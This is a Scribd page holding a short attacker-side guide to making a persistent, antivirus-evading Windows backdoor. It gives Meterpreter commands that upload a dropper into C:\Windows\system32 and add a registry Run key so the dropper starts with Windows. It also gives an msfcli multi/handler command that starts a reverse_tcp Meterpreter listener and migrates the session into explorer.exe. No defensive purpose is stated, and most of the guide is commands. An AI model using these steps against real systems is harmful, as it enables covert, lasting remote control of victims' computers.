Scribd Logo
Upload

Welcome to Scribd!

  • 4-Create The Persistent Backdoor:ok:: Spoiler

    Uploaded by

    Utkarsh Kahar
    5 views2 pages
    The document discusses creating a persistent backdoor on a system by uploading an executable to the Windows system32 directory using Meterpreter. It recommends adding a registry entry to launch the executable at startup, and restarting the Meterpreter listener to reconnect during system reboot.

    Original Description:

    How to add persistence to a virus.

    Original Title

    Persistence

    Copyright

    © © All Rights Reserved

    Available Formats

    DOCX, PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    Report this Document
    The document discusses creating a persistent backdoor on a system by uploading an executable to the Windows system32 directory using Meterpreter. It recommends adding a registry entry to launch the executable at startup, and restarting the Meterpreter listener to reconnect during system reboot.

    Copyright:

    © All Rights Reserved
    Download as DOCX, PDF, TXT or read online from Scribd
    Flag for inappropriate content
    5 views2 pages

    4-Create The Persistent Backdoor:ok:: Spoiler

    Uploaded by

    Utkarsh Kahar
    The document discusses creating a persistent backdoor on a system by uploading an executable to the Windows system32 directory using Meterpreter. It recommends adding a registry entry to launch the executable at startup, and restarting the Meterpreter listener to reconnect during system reboot.

    Copyright:

    © All Rights Reserved
    Download as DOCX, PDF, TXT or read online from Scribd
    Flag for inappropriate content
    of 2

    4-Create the persistent

    backdoor :ok:
    Spoiler:
    (I know the script persistence.rb there, but I wanted to do a backdoor persis
    tent and undetectable as possible by the antivirus)

    If you use the method for add an icon you can add %windir%\system32 in t
    he extract dir.
    If you not you can use the meterpreter for upload your dropper with this co
    mmand:
    Code:
    meterpreter> upload /root/exec.exe C:\\Windows\\system32\\

    Add an entry in the register for launch your dropper at windows start
    Code:
    meterpreter> reg setval -k HKLM\\software\\microsoft\\windows\\currentversi
    on\\run -v exec -d '"c:\windows\system32\exec.exe"'

    Check the register


    Code:
    meterpreter>reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversi
    on\\run

    During the reboot restart your listener


    Code:
    msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LPORT=
    4444 LHOST=192.168.1.97 Autorunscript='migrate -n explorer.exe' E

    You may find your Meterpreter restarts automatically soon as a session is o


    pened.
    Conclusion

    You might also like